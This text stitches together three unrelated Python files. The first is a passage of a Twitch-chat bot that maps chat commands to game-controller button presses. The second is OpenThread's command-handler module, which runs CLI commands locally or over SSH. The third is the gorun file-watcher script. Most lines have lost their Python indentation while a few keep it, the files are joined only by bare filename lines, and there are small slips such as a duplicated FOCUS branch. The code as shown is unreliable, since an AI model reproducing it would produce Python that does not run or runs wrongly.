elif single in ["KEEP_HOLD_L", "KEEP_HOLD_LB", "KEEP_HOLD_R", "KEEP_HOLD_RB", "KEEP_HOLD_ZL", "KEEP_HOLD_LT", "KEEP_HOLD_ZR", "KEEP_HOLD_RT"]:
if single in ["KEEP_HOLD_L", "KEEP_HOLD_LB"]:
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
elif single in ["KEEP_HOLD_R", "KEEP_HOLD_RB"]:
increment_button_count("R")
controller.hold_buttons(BUTTON_R)
elif single in ["KEEP_HOLD_ZL", "KEEP_HOLD_LT"]:
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
elif single in ["KEEP_HOLD_ZR", "KEEP_HOLD_RT"]:
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
command_executed = True
elif single in ["RELEASE_L", "RELEASE_LB", "RELEASE_R", "RELEASE_RB", "RELEASE_ZL", "RELEASE_LT", "RELEASE_ZR", "RELEASE_RT"]:
if single in ["RELEASE_L", "RELEASE_LB"]:
controller.release_buttons(BUTTON_L)
elif single in ["RELEASE_R", "RELEASE_RB"]:
controller.release_buttons(BUTTON_R)
elif single in ["RELEASE_ZL", "RELEASE_LT"]:
controller.release_buttons(BUTTON_ZL)
elif single in ["RELEASE_ZR", "RELEASE_RT"]:
controller.release_buttons(BUTTON_ZR)
command_executed = True
elif single in ["KEEP_HOLD_UP", "KEEP_HOLD_DOWN", "KEEP_HOLD_LEFT", "KEEP_HOLD_RIGHT"]:
if single == "KEEP_HOLD_UP":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
elif single == "KEEP_HOLD_DOWN":
increment_button_count("DOWN")
controller.hold_dpad(DPAD_DOWN)
elif single == "KEEP_HOLD_LEFT":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
elif single == "KEEP_HOLD_RIGHT":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
command_executed = True
elif single in ["RELEASE_DPAD", "RELEASE_UP", "RELEASE_DOWN", "RELEASE_LEFT", "RELEASE_RIGHT"]:
controller.release_dpad()
command_executed = True
#game sensitive
elif single in ["JUMP_FORWARD", "JUMP_UP", "JUMP", "JUMP_BACK", "JUMP_DOWN", "JUMP_LEFT", "JUMP_RIGHT"]:
if single == "JUMP_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_BACK":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
elif single == "JUMP_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.05)
controller.hold_buttons(JUMP_BUTTON)
sleep(0.95)
controller.release_buttons(JUMP_BUTTON)
controller.release_left_stick()
command_executed = True
elif single in ["HOP", "HOP_FORWARD", "HOP_UP", "HOP_BACKWARD", "HOP_BACK", "HOP_DOWN", "HOP_LEFT", "HOP_RIGHT"]:
if single == "HOP":
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
elif single == "HOP_FORWARD":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single in ["HOP_BACKWARD", "HOP_BACK"]:
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_LEFT":
increment_button_count("LX MIN")
controller.move_left()
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
elif single == "HOP_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
sleep(0.05)
controller.push_button(JUMP_BUTTON)
sleep(0.15)
controller.release_left_stick()
command_executed = True
#game specific commands
elif single == "CROUCH":
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single == "STAND":
increment_button_count("LCLICK")
controller.push_button(BUTTON_LCLICK)
command_executed = True
elif single == "BLOCK":
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.release_buttons(BUTTON_ZL)
command_executed = True
elif single == "SHIELD":
increment_button_count("ZL")
controller.hold_buttons(BUTTON_ZL)
sleep(1.0)
controller.hold_buttons(BUTTON_ZL)
command_executed = True
elif single == "RUNE":
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
command_executed = True
elif single == "USE_RUNE":
increment_button_count("L")
controller.hold_buttons(BUTTON_L)
sleep(1.0)
controller.release_buttons(BUTTON_L)
command_executed = True
elif single == "DRAW_ARROW":
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.hold_buttons(BUTTON_ZR)
command_executed = True
elif single == "SHOOT_ARROW":
increment_button_count("ZR")
controller.hold_buttons(BUTTON_ZR)
sleep(1.0)
controller.release_buttons(BUTTON_ZR)
command_executed = True
elif single == "NEXT_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "NEXT_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("R")
controller.push_button(BUTTON_R)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_WEAPON":
increment_button_count("RIGHT")
controller.hold_dpad(DPAD_RIGHT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_ARROW":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_SHIELD":
increment_button_count("LEFT")
controller.hold_dpad(DPAD_LEFT)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "PREVIOUS_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "LAST_RUNE":
increment_button_count("UP")
controller.hold_dpad(DPAD_UP)
sleep(0.5)
increment_button_count("L")
controller.push_button(BUTTON_L)
sleep(0.5)
controller.release_dpad()
command_executed = True
elif single == "ATTACK":
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.2)
command_executed = True
elif single == "BASH":
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.5)
command_executed = True
elif single == "CLIMB":
increment_button_count("X")
controller.push_button(BUTTON_X)
command_executed = True
elif single == "FOCUS":
increment_button_count("ZL")
controller.push_button(BUTTON_ZL)
command_executed = True
elif single == "SHEIKAH_SLATE":
increment_button_count("SELECT")
controller.push_button(BUTTON_MINUS)
sleep(0.5)
command_executed = True
elif single == "MENU":
increment_button_count("START")
controller.push_button(BUTTON_PLUS)
sleep(0.5)
command_executed = True
elif single == "STRAFE_LEFT":
controller.move_left()
controller.hold_buttons(BUTTON_ZL)
sleep(1.5)
controller.release_buttons(BUTTON_ZL)
controller.release_left_stick()
command_executed = True
elif single == "STRAFE_RIGHT":
controller.move_right()
controller.hold_buttons(BUTTON_ZL)
sleep(1.5)
controller.release_buttons(BUTTON_ZL)
controller.release_left_stick()
command_executed = True
elif single == "FOCUS":
controller.push_button(BUTTON_ZL)
command_executed = True
elif single in ["RUN", "RUN_FORWARD", "RUN_UP", "RUN_BACKWARD", "RUN_BACK", "RUN_DOWN", "RUN_LEFT", "RUN_RIGHT"]:
if single in ["RUN", "RUN_FORWARD"]:
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single in ["RUN_BACKWARD", "RUN_BACK"]:
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_UP":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_DOWN":
increment_button_count("LY MAX")
controller.move_backward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_LEFT":
increment_button_count("LX MIN")
controller.move_left()
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
elif single == "RUN_RIGHT":
increment_button_count("LX MAX")
controller.move_right()
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(1.0)
controller.release_buttons(BUTTON_B)
controller.release_left_stick()
command_executed = True
elif single in ["ONWARD"]:
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
command_executed = True
elif single in ["STOP", "STILL"]:
controller.release_left_stick()
command_executed = True
elif single == "PULL_OUT":
increment_button_count("A")
controller.hold_buttons(BUTTON_A)
command_executed = True
elif single == "MOVEMENTWAIT":
controller.reset().wait()
command_executed = True
elif single == "CONNECT": #connect the controller to the console
controller.connect()
command_executed = True
# Experimental
elif single == "DASH_ATTACK":
increment_button_count("LY MIN")
controller.move_forward(GAME_MODE)
increment_button_count("B")
controller.hold_buttons(BUTTON_B)
sleep(0.05)
increment_button_count("Y")
controller.push_button(BUTTON_Y)
sleep(0.15)
controller.release_left_stick()
controller.release_buttons(BUTTON_B)
command_executed = True
elif single == "GLIDE":
controller.move_forward(GAME_MODE)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.push_button(BUTTON_X)
sleep(0.05)
controller.release_left_stick()
command_executed = True
# Custom commands
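# Example (illustrative, not from the original source): a chat message of
# "CUSTOM([A;UP] 0.5)" is parsed into combine == ["A", "UP"] and duration == 0.5,
# i.e. the A button and D-pad up are held together for half a second and then released.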
elif single[0:7] == "CUSTOM(" and single.find(")") > 7: # single == "CUSTOM(smthg)"
tmpr = single[7:single.find(")")].strip().replace("_", " ") # tmpr == "smthg"
combine = []
if tmpr[0:1] == "[" and tmpr.find("]") > 0: # tmpr == "a[b, ...]c"
combine = tmpr[tmpr.find("[") + 1:tmpr.find("]")].split(";") # combine == ["b", "..."]
tmpr = tmpr[tmpr.find("]") + 1:] # tmpr == "c"
elif tmpr.find(";") > -1: # tmpr == "x,y"
combine = [tmpr[0:tmpr.find(";")]] # combine == ["x"]
else: # tmpr = "x"
combine = [tmpr] # combine == ["x"]
tmpr = ""
tmpr = tmpr[tmpr.find(";") + 1:].strip()
# At this point...
# combine is an array of commands
# tmpr is a string supposedly containing the duration of the custom command
duration = 0.02
try:
    duration = float(tmpr)
    if not (0 < duration <= 1): # the duration has to be between 0 and 1 second
        duration = 0.02
except ValueError:
    pass
cmd = [] # array of the commands to execute, again...
for i in combine:
i = i.strip().replace(" ", "_")
if i in ["PLUS", "START"]:
increment_button_count("START")
cmd.append(BUTTON_PLUS)
elif i in ["MINUS", "SELECT"]:
increment_button_count("SELECT")
cmd.append(BUTTON_MINUS)
elif i == "A":
increment_button_count("A")
cmd.append(BUTTON_A)
elif i == "B":
increment_button_count("B")
cmd.append(BUTTON_B)
elif i == "X":
increment_button_count("X")
cmd.append(BUTTON_X)
elif i == "Y":
increment_button_count("Y")
cmd.append(BUTTON_Y)
elif i in ["UP", "DUP", "D_UP"]:
increment_button_count("UP")
cmd.append(DPAD_UP)
elif i in ["DOWN", "DDOWN", "D_DOWN"]:
increment_button_count("DOWN")
cmd.append(DPAD_DOWN)
elif i in ["LEFT", "DLEFT", "D_LEFT"]:
increment_button_count("LEFT")
cmd.append(DPAD_LEFT)
elif i in ["RIGHT", "DRIGHT", "D_RIGHT"]:
increment_button_count("RIGHT")
cmd.append(DPAD_RIGHT)
elif i in ["L", "LB"]:
increment_button_count("L")
cmd.append(BUTTON_L)
elif i in ["R", "RB"]:
increment_button_count("R")
cmd.append(BUTTON_R)
elif i in ["ZL", "LT"]:
increment_button_count("ZL")
cmd.append(BUTTON_ZL)
elif i in ["ZR", "RT"]:
increment_button_count("ZR")
cmd.append(BUTTON_ZR)
elif i in ["LCLICK", "L3"]:
increment_button_count("LCLICK")
cmd.append(BUTTON_LCLICK)
elif i in ["RCLICK", "R3"]:
increment_button_count("RCLICK")
cmd.append(BUTTON_RCLICK)
elif i in ["LUP", "L_UP"]:
increment_button_count("LY MIN")
cmd.append("L_UP")
elif i in ["LDOWN", "L_DOWN"]:
increment_button_count("LY MAX")
cmd.append("L_DOWN")
elif i in ["LLEFT", "L_LEFT"]:
increment_button_count("LX MIN")
cmd.append("L_LEFT")
elif i in ["LRIGHT", "L_RIGHT"]:
increment_button_count("LX MAX")
cmd.append("L_RIGHT")
elif i in ["RUP", "R_UP"]:
increment_button_count("RY MIN")
cmd.append("R_UP")
elif i in ["RDOWN", "R_DOWN"]:
increment_button_count("RY MAX")
cmd.append("R_DOWN")
elif i in ["RLEFT", "R_LEFT"]:
increment_button_count("RX MIN")
cmd.append("R_LEFT")
elif i in ["RRIGHT", "R_RIGHT"]:
increment_button_count("RX MAX")
cmd.append("R_RIGHT")
elif i == "WAIT":
cmd.append("WAIT")
for i in cmd: # buttons to hold
if i in [BUTTON_PLUS, BUTTON_MINUS, BUTTON_A, BUTTON_B, BUTTON_X, BUTTON_Y, BUTTON_L, BUTTON_R,
BUTTON_ZL, BUTTON_ZR, BUTTON_LCLICK, BUTTON_RCLICK]:
controller.hold_buttons(i)
command_executed = True
elif i in [DPAD_UP, DPAD_DOWN, DPAD_LEFT, DPAD_RIGHT]:
controller.hold_dpad(i)
command_executed = True
elif i == "L_UP":
controller.move_forward(GAME_MODE)
command_executed = True
elif i == "L_DOWN":
controller.move_backward(GAME_MODE)
command_executed = True
elif i == "L_LEFT":
controller.move_left()
command_executed = True
elif i == "L_RIGHT":
controller.move_right()
command_executed = True
elif i == "R_UP":
controller.look_up()
command_executed = True
elif i == "R_DOWN":
controller.look_down()
command_executed = True
elif i == "R_LEFT":
controller.look_left()
command_executed = True
elif i == "R_RIGHT":
controller.look_right()
command_executed = True
elif i == "WAIT":
command_executed = True
if command_executed: # sleep if any command has been executed
sleep(duration)
for i in cmd: # release the buttons
if i in [BUTTON_PLUS, BUTTON_MINUS, BUTTON_A, BUTTON_B, BUTTON_X, BUTTON_Y, BUTTON_L, BUTTON_R,
BUTTON_ZL, BUTTON_ZR, BUTTON_LCLICK, BUTTON_RCLICK]:
controller.release_buttons(i)
elif i in [DPAD_UP, DPAD_DOWN, DPAD_LEFT, DPAD_RIGHT]:
controller.release_dpad()
elif i in ["L_UP", "L_DOWN", "L_LEFT", "L_RIGHT"]:
controller.release_left_stick()
elif i in ["R_UP", "R_DOWN", "R_LEFT", "R_RIGHT"]:
controller.release_right_stick()
if command_executed:
global LAST_COMMAND
LAST_COMMAND = timestamp()
class TwitchIRC(asyncore.dispatcher):
username = None
password = None
channel = None
authenticated = False
def __init__(self, username: str, password: str, channel: str) -> None:
assert username is not None, "No username specified!"
assert password is not None, "No password specified!"
assert channel is not None, "No channel specified!"
self.username = username
self.password = password
self.channel = channel
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((TWITCH_HOST, TWITCH_PORT))
self.buffer = bytes("PASS %s\r\nNICK %s\r\n" % (password, username), "utf8")
prevent_timeout()
def handle_connect(self):
pass
def handle_close(self):
self.close()
def handle_read(self):
data = self.recv(2048).decode("utf8", errors="ignore").rstrip()
if "Welcome, GLHF!" in data and not self.authenticated:
self.authenticated = True
self.buffer += bytes("JOIN #%s\r\n" % (self.channel), "utf8")
elif data == "PING :tmi.twitch.tv":
print("PING!")
self.buffer += b"PONG :tmi.twitch.tv\r\n"
print("PONG!")
elif "%s.tmi.twitch.tv" % (self.channel) not in data or self.username in data: #chat messages here
global CURRENT_THREAD
matches = CHAT_EXP.match(data)
print(data)
if matches:
(username, command, channel, message) = matches.groups()
print(username + " --> " + message)
if CURRENT_THREAD is None or not CURRENT_THREAD.is_alive():
CURRENT_THREAD = Thread(target=execute_command, args=[message])
CURRENT_THREAD.start()
def readable(self):
return True
def writable(self):
return (len(self.buffer) > 0)
def handle_write(self):
sent = self.send(self.buffer)
self.buffer = self.buffer[sent:]
if __name__ == "__main__":
#load or create config
if isfile(CONFIG_FILE):
cfg = load(open(CONFIG_FILE, "r"))
else:
cfg = {"username": "", "password": ""}
dump(cfg, open(CONFIG_FILE, "w"))
print("Sample config created!")
raise Exception("Please edit the configuration file to reflect your Twitch API settings")
#check if database exists
if not isfile(DATABASE_FILE):
create_database()
print("Database created!")
with Controller() as controller:
try:
print("https://www.twitch.tv/" + cfg["username"])
irc = TwitchIRC(cfg["username"], cfg["password"], cfg["username"])
except KeyboardInterrupt:
controller.reset().wait()
exit(0)
asyncore.loop()
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
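# Illustrative expectation (an assumption, not part of the original interface): a
# concrete handler's execute_command('state', timeout=10) would return output such as
# ['leader', 'Done'], following the OT CLI convention described in the docstring above.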
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {
'scan',
}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.daemon = True
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
self.__otcli.writeline(cmd)
if cmd in {'reset', 'factoryreset'}:
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
line = self.__otcli.readline()
if line.startswith('> '):
line = line[2:]
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password):
import paramiko
self.__host = host
self.__port = port
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'sudo ot-ctl "{cmd}"'
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(sh_cmd, timeout=int(timeout), bufsize=1024)
err = cmd_err.read().decode('utf-8')
if err:
raise CommandError(cmd, [err])
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
|
gorun.py
|
#!/usr/bin/env python
#
# Wrapper on pyinotify for running commands
# (c) 2009 Peter Bengtsson, peter@fry-it.com
#
# TODO: Ok, now it does not start a command while another is running
# But! then what if you actually wanted to test a modification you
# saved while running another test
# Yes, we could stop the running command and replace it by the new test
# But! django tests will complain that a test db is already here
import argparse
import os
import sys
from subprocess import Popen
from threading import Lock, Thread
__version__='1.6'
class SettingsClass(object):
VERBOSE = False
settings = SettingsClass()
try:
from pyinotify import WatchManager, Notifier, ThreadedNotifier, ProcessEvent, EventsCodes
except ImportError:
print "pyinotify not installed. Try: easy_install pyinotify"
raise
def _find_command(path):
# path is a file
assert os.path.isfile(path)
# the lookup dictionary has files and directories as keys.
# if this path exists in there, it's a simple match
try:
return lookup[path]
except KeyError:
pass
# is the parent directory in there?
while path != '/':
path = os.path.dirname(path)
try:
return lookup[path]
except KeyError:
pass
def _ignore_file(path):
if path.endswith('.pyc'):
return True
if path.endswith('~'):
return True
basename = os.path.basename(path)
if basename.startswith('.#'):
return True
if basename.startswith('#') and basename.endswith('#'):
return True
if '.' in os.path.basename(path) and \
basename.split('.')[-1] in settings.IGNORE_EXTENSIONS:
return True
if os.path.split(os.path.dirname(path))[-1] in settings.IGNORE_DIRECTORIES:
return True
if not os.path.isfile(path):
return True
class PTmp(ProcessEvent):
def __init__(self):
super(PTmp, self).__init__()
self.lock = Lock()
def process_IN_CREATE(self, event):
if os.path.basename(event.pathname).startswith('.#'):
# backup file
return
print "Creating:", event.pathname
command = _find_command(event.pathname)
#def process_IN_DELETE(self, event):
# print "Removing:", event.pathname
# command = _find_command(event.pathname)
def process_IN_MODIFY(self, event):
if _ignore_file(event.pathname):
return
def execute_command(event, lock):
# By default trying to acquire a lock is blocking
# In this case it will create a queue of commands to run
#
# If you try to acquire the lock in the locked state in a non-blocking
# style, it immediately returns False and you know that a
# command is already running, and in this case we don't want to run
# this command at all.
block = settings.RUN_ON_EVERY_EVENT
if not lock.acquire(block):
# in this case we just want to not execute the command
return
print "Modifying:", event.pathname
command = _find_command(event.pathname)
if command:
if settings.VERBOSE:
print "Command: ",
print command
p = Popen(command, shell=True)
sts = os.waitpid(p.pid, 0)
lock.release()
command_thread = Thread(target=execute_command, args=[event, self.lock])
command_thread.start()
def start(actual_directories):
wm = WatchManager()
flags = EventsCodes.ALL_FLAGS
mask = flags['IN_MODIFY'] #| flags['IN_CREATE']
p = PTmp()
notifier = Notifier(wm, p)
for actual_directory in actual_directories:
print "DIRECTORY", actual_directory
wdd = wm.add_watch(actual_directory, mask, rec=True)
# notifier = Notifier(wm, p, timeout=10)
try:
print "Waiting for stuff to happen..."
notifier.loop()
except KeyboardInterrupt:
pass
return 0
lookup = {}
def configure_more(directories):
actual_directories = set()
#print "directories", directories
# Tune the configured directories a bit
for i, (path, cmd) in enumerate(directories):
if isinstance(path, (list, tuple)):
actual_directories.update(configure_more(
[(x, cmd) for x in path]))
continue
if not path.startswith('/'):
path = os.path.join(os.path.abspath(os.path.dirname('.')), path)
if not (os.path.isfile(path) or os.path.isdir(path)):
raise OSError, "%s neither a file or a directory" % path
path = os.path.normpath(path)
if os.path.isdir(path):
if path.endswith('/'):
# tidy things up
path = path[:-1]
if path == '.':
path = ''
actual_directories.add(path)
else:
# because we can't tell pyinotify to monitor files,
# when a file is configured, add its directory
actual_directories.add(os.path.dirname(path))
lookup[path] = cmd
return actual_directories
def get_settings_file():
"""Return a setting file path or exit if not passed in and no
defaults settings files are found.
"""
parser = argparse.ArgumentParser(description="Gorun")
path_files = [os.path.expanduser('~/.gorun_settings.py'),
os.path.expanduser('~/.gorunsettings.py')]
parser.add_argument('-c', '--conf', help='Full path to the configuration file')
ns = parser.parse_args()
settings_file = None
if ns.conf:
settings_file = ns.conf
else:
for path in path_files:
if os.path.isfile(path):
settings_file = path
print("Using configuration file %s" % settings_file)
break
if settings_file is None:
parser.print_help()
sys.exit(1)
return settings_file
if __name__ == '__main__':
import sys
import imp
settings_file = get_settings_file()
sys.path.append(os.path.abspath(os.curdir))
x = imp.load_source('gorun_settings', settings_file)
settings.DIRECTORIES = x.DIRECTORIES
